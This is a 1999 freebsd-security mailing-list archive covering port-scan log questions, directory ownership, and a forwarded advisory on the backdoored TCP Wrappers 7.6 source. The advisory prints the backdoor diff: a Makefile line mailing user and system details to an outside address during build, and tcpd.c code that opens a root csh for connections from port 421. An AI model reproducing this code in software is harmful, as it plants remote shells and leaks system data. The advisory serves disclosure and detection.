(d152-173.ce.mediaone.net [24.131.152.173]) by elmls02.ce.mediaone.net (8.8.7/8.8.7) with ESMTP id MAA29101; Thu, 21 Jan 1999 12:42:03 -0600 (CST) Message-ID: <36A773CB.166983C@enteract.com> Date: Thu, 21 Jan 1999 12:36:59 -0600 From: Anthony Kim Organization: deus ex machina X-Mailer: Mozilla 4.5 [en] (Win98; U) X-Accept-Language: zh-TW,en MIME-Version: 1.0 To: andrew@squiz.co.nz CC: "security@FreeBSD.ORG" Subject: Re: TCP port question IPFW References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've tried the well known services. Nothing doing. Why people bother -- I've no important data -- that's what I'd like to know. Andrew McNaughton wrote: > > > I'm sort of annoyed...there is some IP who is constantly filling up my > > ipfw logs with TCP port 1719 attempts daily. The hours are late in the > > If you're annoyed by the log entries, but not concerned by them, then > don't log entries from their IP to that port. Among other things, this > sort of practice makes it more likely you'll see important log info. > Logging too much is a bad thing. OTOH, it can clutter your firewall > ruleset. > > > evening until around 2am, then it begins again shortly after 6pm (he or > > she must have come home from work and felt like bugging me). More > > recently I see requests for TCP port 1106 in my logs as well from them. > > A quick search on the web showed 1719 was h323gatestat. Can someone tell > > me what that is? I didn't find anything on TCP port 1106 either. Any > > info is greatly appreciated. Also, anyway I can track this person down? > > traceroute works but no hostname returns. > > You might be able to identify their service provider from other entries in > the traceroute. Also, doing a reverse lookup on other IP's in the same > class C network often clarifies who owns the network. > > It's often possible to connect to services like telnet, smtp, ftp and get > a machine name. This basically ammounts to a localised port scan. It's > easily justified, but I wonder if people ever get into trouble with their > ISP's as a result of it. > > Andrew > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- SYSADMIN(1) sysadmin takes care of everything, is generally harangued, must be supplied with coffee, chocolate, and alcohol in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 22 01:31:17 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA15084 for freebsd-security-outgoing; Fri, 22 Jan 1999 01:31:17 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA15078; Fri, 22 Jan 1999 01:31:13 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.1/8.8.5) with ESMTP id KAA02318; Fri, 22 Jan 1999 10:30:43 +0100 (CET) To: ports@FreeBSD.ORG, security@FreeBSD.ORG Subject: TCP wrapper distribution copy has been trojaned... From: Poul-Henning Kamp Date: Fri, 22 Jan 1999 10:30:43 +0100 Message-ID: <2316.916997443@critter.freebsd.dk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://www.news.com/News/Item/0,4,31274,00.html -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 22 04:12:44 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA04228 for freebsd-security-outgoing; Fri, 22 Jan 1999 04:12:44 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gw.uct.kiev.ua (AS15.ACN-KVC5.ukrpack.net [195.230.152.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA04222 for ; Fri, 22 Jan 1999 04:12:36 -0800 (PST) (envelope-from gnut@uct.kiev.ua) Received: from uct.kiev.ua (nut.uct.kiev.ua [212.1.70.3]) by gw.uct.kiev.ua (8.8.8/8.8.8) with ESMTP id OAA24439 for ; Fri, 22 Jan 1999 14:12:11 +0200 (EET) (envelope-from gnut@uct.kiev.ua) Message-ID: <36A86BB1.FE6D238A@uct.kiev.ua> Date: Fri, 22 Jan 1999 14:14:41 +0200 From: "Oles' Hnatkevych" Organization: Private X-Mailer: Mozilla 4.07 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: rshd in messages Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! In /var/log/messages I got: Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on illegal port 1093 Jan 22 11:56:19 gw rshd[23778]: connection from 199.174.248.162 on illegal port 1204 What it can be? Someone misspelled IP address? -- Best wishes, Oles Hnatkevych, http://gnut.kiev.ua To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 22 06:35:02 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA22915 for freebsd-security-outgoing; Fri, 22 Jan 1999 06:35:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ACC.sim.net.ua ([62.244.20.221]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA22863 for ; Fri, 22 Jan 1999 06:34:44 -0800 (PST) (envelope-from pasha@sim.net.ua) Received: from GW.sim.net.ua (gw [62.244.20.220]) by ACC.sim.net.ua (8.9.2/8.8.4) with SMTP id QAA16479; Fri, 22 Jan 1999 16:32:57 +0200 (EET) Message-ID: <36A88C19.284797A9@sim.net.ua> Date: Fri, 22 Jan 1999 14:32:57 +0000 From: Pavel Narozhniy X-Mailer: Mozilla 3.04 (X11; I; FreeBSD 2.2.8-RELEASE i386) MIME-Version: 1.0 To: "Oles' Hnatkevych" CC: freebsd-security@FreeBSD.ORG Subject: Re: rshd in messages References: <36A86BB1.FE6D238A@uct.kiev.ua> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Oles' Hnatkevych wrote: > > Hello! > > In /var/log/messages I got: > > Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on > illegal port 1093 > Jan 22 11:56:19 gw rshd[23778]: connection from on > illegal port 1204 > > What it can be? Someone misspelled IP address? Somebody from 199.174.248.162 scanning TCP ports on your machine. -- Pavel Narozhniy nic-hdl: PN395-RIPE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 22 09:41:54 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA12756 for freebsd-security-outgoing; Fri, 22 Jan 1999 09:41:54 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA12751; Fri, 22 Jan 1999 09:41:48 -0800 (PST) (envelope-from mike@seidata.com) From: mike@seidata.com Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with ESMTP id MAA21278; Fri, 22 Jan 1999 12:41:36 -0500 (EST) Date: Fri, 22 Jan 1999 12:41:32 -0500 (EST) To: Poul-Henning Kamp cc: ports@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: TCP wrapper distribution copy has been trojaned... In-Reply-To: <2316.916997443@critter.freebsd.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 22 Jan 1999, Poul-Henning Kamp wrote: > http://www.news.com/News/Item/0,4,31274,00.html >From Wietse himself (Bugtraq): >From wietse@PORCUPINE.ORG Fri Jan 22 12:38:11 1999 Date: Thu, 21 Jan 1999 11:38:17 -0500 From: Wietse Venema Subject: backdoored tcp wrapper source code TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. In has an estimated installed base of millions. Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a backdoored version. Eventually this was bound to happen, and that's why the source file is accompanied by a PGP signature. But that is no guarantee against people downloading and installing backdoored software. The backdoor gives access to a privileged shell when a client connects from port 421. The backdoored copy was downloaded 52 times between 07:16 MET and 16:29 MET. I have informed the sites that downloaded a copy. Below are details on how to recognize the backdoored version. Wietse Relevant time stamp/size information (times relative to MET): Backdoored version: % ls -lcta -r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz ... dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 . Restored version: % ls -lt tcp_wrappers_7.6.tar.gz -r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz The signature of the bad TAR file is: length 99186 instead of 99438. The signature of a compiled tcpd binary is: strings -a tcpd | grep csh any output probably means trouble. Changes that were made to the tcp wrapper 7.6 source code: diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile *** 7.6/Makefile Mon Apr 7 20:34:16 1997 --- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997 *************** *** 26,31 **** --- 26,32 ---- @echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'." + @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com' @echo ####################################################### *************** *** 649,655 **** # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ --- 650,656 ---- # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! # KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ Only in 7.6: Makefile- diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c *** 7.6/tcpd.c Sun Feb 11 11:01:33 1996 --- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996 *************** *** 41,52 **** --- 41,63 ---- int allow_severity = SEVERITY; /* run-time adjustable */ int deny_severity = LOG_WARNING; /* ditto */ + char IDENT[]="NC421\n"; + char SRUN[]="-csh"; + char SPATH[]="/bin/csh"; + #define PORT 421 + main(argc, argv) int argc; char **argv; { struct request_info request; + struct sockaddr_in from; char path[MAXPATHNAMELEN]; + int fromlen; + + fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from, + &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT, + strlen(IDENT));execl(SPATH,SRUN,(char*)0);}} /* Attempt to prevent the creation of world-writable files. */ -- Mike Hoskins System/Network Administrator SEI Data Network Services, Inc. http://www.seidata.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 22 10:54:57 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA22675 for freebsd-security-outgoing; Fri, 22 Jan 1999 10:54:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA22659 for ; Fri, 22 Jan 1999 10:54:52 -0800 (PST) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id LAA18978; Fri, 22 Jan 1999 11:54:40 -0700 (MST) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.1/8.9.1) id LAA58328; Fri, 22 Jan 1999 11:54:39 -0700 (MST) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Fri, 22 Jan 1999 11:54:39 -0700 (MST) From: "David G. Andersen" To: "Oles' Hnatkevych" Cc: freebsd-security@FreeBSD.ORG Subject: Re: rshd in messages In-Reply-To: Oles' Hnatkevych's message of Fri, January 22 1999 <36A86BB1.FE6D238A@uct.kiev.ua> References: <36A86BB1.FE6D238A@uct.kiev.ua> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <13992.51540.10896.239954@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's typically a sign that someone is port scanning your machine. (for further information, do a web search on "nmap" or "strobe"). -Dave Lo and Behold, Oles' Hnatkevych said: > Hello! > > > In /var/log/messages I got: > > Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on > illegal port 1093 > Jan 22 11:56:19 gw rshd[23778]: connection from 199.174.248.162 on > illegal port 1204 > > What it can be? Someone misspelled IP address? > > -- > Best wishes, > > Oles Hnatkevych, http://gnut.kiev.ua > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 22 20:13:23 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA08806 for freebsd-security-outgoing; Fri, 22 Jan 1999 20:13:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA08801 for ; Fri, 22 Jan 1999 20:13:21 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.8.8/8.8.8) id XAA02392 for freebsd-security@freebsd.org; Fri, 22 Jan 1999 23:14:40 -0500 (EST) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> Subject: bin Directory Ownership To: freebsd-security@FreeBSD.ORG Date: Fri, 22 Jan 1999 23:14:40 -0500 (EST) Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >From a number of sources, I have been told it is not ideal, from a security point of view, to have any root owned executables in a directory owned by another user, even an administrative user. The logic is that even if administrative users have logins disabled, their actions, if they do get a shell or some ability to execute commands, are not as closely watched as root. Since it is gernerally assumed commands owned by root are 'safe,' the fact that these commands could be switched to something else by a non-root user is considered a securiy hole. I have noticed that /usr/bin has the ownership of user 'bin' and group 'bin.' This is in spite of the fact that I count more than 2 dozen commands onwed by root that are installed by the standard FreeBSD installation tools or ports. In addition, /usr/libexec and /usr/sbin (!!!) are owned by bin but contain root owned executables. Am I being over protective? Is there a problem with my installation? Do I need to relax? Thanks for any responses. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 03:01:59 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA13266 for freebsd-security-outgoing; Sat, 23 Jan 1999 03:01:59 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (FLEDGE.RES.CMU.EDU [128.2.93.229]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA13261 for ; Sat, 23 Jan 1999 03:01:58 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id GAA17793; Sat, 23 Jan 1999 06:01:40 -0500 (EST) Date: Sat, 23 Jan 1999 06:01:40 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: cjclark@home.com cc: freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership In-Reply-To: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 22 Jan 1999, Crist J. Clark wrote: > From a number of sources, I have been told it is not ideal, from a > security point of view, to have any root owned executables in a > directory owned by another user, even an administrative user. The > logic is that even if administrative users have logins disabled, their > actions, if they do get a shell or some ability to execute commands, > are not as closely watched as root. Since it is gernerally assumed > commands owned by root are 'safe,' the fact that these commands could > be switched to something else by a non-root user is considered a > securiy hole. > > I have noticed that /usr/bin has the ownership of user 'bin' and group > 'bin.' This is in spite of the fact that I count more than 2 dozen > commands onwed by root that are installed by the standard FreeBSD > installation tools or ports. In addition, /usr/libexec and /usr/sbin > (!!!) are owned by bin but contain root owned executables. > > Am I being over protective? Is there a problem with my installation? > Do I need to relax? > > Thanks for any responses. -- Crist J. Clark cjclark@home.com You are correct--there is no security improvement through the use of the bin user. However, it is also the case that (aside from false assumptions about some improvement) security is probably not damaged by having a bin user. I am in the process of some research analyzing the impact of file and directory ownership affecting the UNIX trust model (especially w.r.t. setuid and setgid binaries). I will post the results when I finish up (probably in a month or so). Access to the bin account is very limited; effectively, to acquire a uid bin process capable of modifying the binaries, you would first have to have a uid root process that you had subverted. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 03:31:27 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA16122 for freebsd-security-outgoing; Sat, 23 Jan 1999 03:31:27 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id DAA16081 for ; Sat, 23 Jan 1999 03:31:22 -0800 (PST) (envelope-from lutz@muc.de) Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <140570-1>; Sat, 23 Jan 1999 12:30:53 +0100 Received: (from daemon@localhost) by tavari.muc.de (8.8.8/8.8.7) id MAA11087; Sat, 23 Jan 1999 12:30:18 +0100 (CET) Received: from abraxas(192.168.42.5) by morranon via smap (V2.1) id xma011085; Sat, 23 Jan 99 12:30:16 +0100 Message-ID: <36A9B2B8.701439C0@muc.de> Date: Sat, 23 Jan 1999 12:30:00 +0100 From: Lutz Albers X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 3.0-CURRENT i386) X-Accept-Language: en MIME-Version: 1.0 To: cjclark@home.com CC: freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Crist J. Clark" wrote: > > I have noticed that /usr/bin has the ownership of user 'bin' and group > 'bin.' This is in spite of the fact that I count more than 2 dozen > commands onwed by root that are installed by the standard FreeBSD > installation tools or ports. In addition, /usr/libexec and /usr/sbin > (!!!) are owned by bin but contain root owned executables. > > Am I being over protective? Is there a problem with my installation? > Do I need to relax? Which version of FreeBSD you're running ? On my FreeBSD-3.0-CURRENT box this directory is owned by root.wheel: lutz@abraxas[~] > ls -ld /usr/bin drwxr-xr-x 2 root wheel 6656 Jan 21 19:43 /usr/bin lutz -- Lutz Albers, lutz@muc.de, pgp key available from Do not take life too seriously, you will never get out of it alive. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 04:32:47 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA26222 for freebsd-security-outgoing; Sat, 23 Jan 1999 04:32:47 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from smtp1.xs4all.nl (smtp1.xs4all.nl [194.109.6.51]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA26216 for ; Sat, 23 Jan 1999 04:32:42 -0800 (PST) (envelope-from unicorn@unicorn.xs4all.nl) Received: from unicorn.xs4all.nl (1001@unicorn.xs4all.nl [194.109.83.155]) by smtp1.xs4all.nl (8.8.8/8.8.8) with ESMTP id NAA17810; Sat, 23 Jan 1999 13:32:26 +0100 (CET) Received: (from unicorn@localhost) by unicorn.xs4all.nl (8.8.8/8.8.8) id NAA21827; Sat, 23 Jan 1999 13:26:13 +0100 (CET) (envelope-from unicorn) Message-ID: <19990123132613.A21293@unicorn.quux.org> Date: Sat, 23 Jan 1999 13:26:13 +0100 From: The Unicorn To: Robert Watson , cjclark@home.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Robert Watson on Sat, Jan 23, 1999 at 06:01:40AM -0500 X-GSM: +31 XXX XXX XXX X-Files: The Truth Is Out There! X-RSAkey: http://keys.pgp.com:11371/pks/lookup?op=get&search=0x0A7B84E7 X-DSSkey: http://keys.pgp.com:11371/pks/lookup?op=get&search=0x0BBF4902 X-Copyright-0: Portions of this message may be subject to copyright. X-Copyright-1: (c)1994-1998 Hans "Unicorn" Van de Looy. X-Disclaimer-0: Comments contained do not necessarily represent X-Disclaimer-1: those of my current employer. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Jan 23, 1999 at 06:01:40AM -0500, Robert Watson wrote: > > You are correct--there is no security improvement through the use of the > bin user. However, it is also the case that (aside from false assumptions > about some improvement) security is probably not damaged by having a bin > user. I am in the process of some research analyzing the impact of file > and directory ownership affecting the UNIX trust model (especially w.r.t. > setuid and setgid binaries). I will post the results when I finish up > (probably in a month or so). Access to the bin account is very limited; > effectively, to acquire a uid bin process capable of modifying the > binaries, you would first have to have a uid root process that you had > subverted. This is not always the case. Have a look at the old but still valid paper from Wietse and Dan: "admin-guide-to-cracking-101" also known as "Improving the Security of Your Site by Breaking Into it". Especially the part on the use of rsh and the wildcard in the /etc/hosts.equiv file (yeah, I know that allowing the r-commands is a BIG NO-NO ;-). > Robert N Watson ---end quoted text--- Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster ================================================ ,;( )_, )~\| A Truly Wise Man Never Plays PGP: 64 07 5D 4C 3F 81 22 73 ;; // `--; Leapfrog With A Unicorn... 52 9D 87 08 51 AA 35 F0 ==='= ;\ = | ==== Youth is not a time in Life, It is a State of Mind! ======= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 04:32:51 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA26234 for freebsd-security-outgoing; Sat, 23 Jan 1999 04:32:51 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from smtp1.xs4all.nl (smtp1.xs4all.nl [194.109.6.51]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA26213 for ; Sat, 23 Jan 1999 04:32:42 -0800 (PST) (envelope-from unicorn@unicorn.xs4all.nl) Received: from unicorn.xs4all.nl (1001@unicorn.xs4all.nl [194.109.83.155]) by smtp1.xs4all.nl (8.8.8/8.8.8) with ESMTP id NAA17807; Sat, 23 Jan 1999 13:32:25 +0100 (CET) Received: (from unicorn@localhost) by unicorn.xs4all.nl (8.8.8/8.8.8) id NAA21835; Sat, 23 Jan 1999 13:28:16 +0100 (CET) (envelope-from unicorn) Message-ID: <19990123132816.B21293@unicorn.quux.org> Date: Sat, 23 Jan 1999 13:28:16 +0100 From: The Unicorn To: Lutz Albers , cjclark@home.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> <36A9B2B8.701439C0@muc.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <36A9B2B8.701439C0@muc.de>; from Lutz Albers on Sat, Jan 23, 1999 at 12:30:00PM +0100 X-GSM: +31 XXX XXX XXX X-Files: The Truth Is Out There! X-RSAkey: http://keys.pgp.com:11371/pks/lookup?op=get&search=0x0A7B84E7 X-DSSkey: http://keys.pgp.com:11371/pks/lookup?op=get&search=0x0BBF4902 X-Copyright-0: Portions of this message may be subject to copyright. X-Copyright-1: (c)1994-1998 Hans "Unicorn" Van de Looy. X-Disclaimer-0: Comments contained do not necessarily represent X-Disclaimer-1: those of my current employer. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Jan 23, 1999 at 12:30:00PM +0100, Lutz Albers wrote: > > Which version of FreeBSD you're running ? On my FreeBSD-3.0-CURRENT box > this directory is owned by root.wheel: > > lutz@abraxas[~] > ls -ld /usr/bin > drwxr-xr-x 2 root wheel 6656 Jan 21 19:43 /usr/bin Most likely 2.2.x. I'm running 2.2.8 and his claim is still valid there. > lutz ---end quoted text--- Ciao, Unicorn. -- ======= _ __,;;;/ TimeWaster ================================================ ,;( )_, )~\| A Truly Wise Man Never Plays PGP: 64 07 5D 4C 3F 81 22 73 ;; // `--; Leapfrog With A Unicorn... 52 9D 87 08 51 AA 35 F0 ==='= ;\ = | ==== Youth is not a time in Life, It is a State of Mind! ======= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 07:50:12 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA14093 for freebsd-security-outgoing; Sat, 23 Jan 1999 07:50:12 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA14084 for ; Sat, 23 Jan 1999 07:50:10 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.8.8/8.8.8) id KAA05725; Sat, 23 Jan 1999 10:51:27 -0500 (EST) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199901231551.KAA05725@cc942873-a.ewndsr1.nj.home.com> Subject: Re: bin Directory Ownership In-Reply-To: from Robert Watson at "Jan 23, 99 06:01:40 am" To: robert+freebsd@cyrus.watson.org Date: Sat, 23 Jan 1999 10:51:27 -0500 (EST) Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson wrote, > Access to the bin account is very limited; > effectively, to acquire a uid bin process capable of modifying the > binaries, you would first have to have a uid root process that you had > subverted. I realize that, but the argument goes that if someone /did/ access root, he could give himself long-term access to bin and possibly other administrative users. Since the actions of these other administrative users are not as tightly watched as root (e.g. no syslog message when you su to one), it might be possible to maintain access for a long time (even if the original way he accessed root had been closed). BTW, I am running a 2.2.*, 2.2.7. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jan 23 08:33:21 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA18466 for freebsd-security-outgoing; Sat, 23 Jan 1999 08:33:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mtiwmhc03.worldnet.att.net (mtiwmhc03.worldnet.att.net [204.127.131.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA18461 for ; Sat, 23 Jan 1999 08:33:19 -0800 (PST) (envelope-from gryphon@healer.com) Received: from healer.com ([12.77.217.122]) by mtiwmhc03.worldnet.att.net (InterMail v03.02.07 118 124) with ESMTP id <19990123163309.HUGE10733@healer.com>; Sat, 23 Jan 1999 16:33:09 +0000 Message-ID: <36AA27D4.C65CE38@healer.com> Date: Sat, 23 Jan 1999 11:49:40 -0800 From: Coranth Gryphon X-Mailer: Mozilla 4.05 [en] (Win95; U) MIME-Version: 1.0 To: cjclark@home.com CC: freebsd-security@FreeBSD.ORG Subject: Re: bin Directory Ownership References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Am I being over protective? Is there a problem with my installation? > Do I need to relax? Most of the non-'bin' executables are either suid or sgid, and 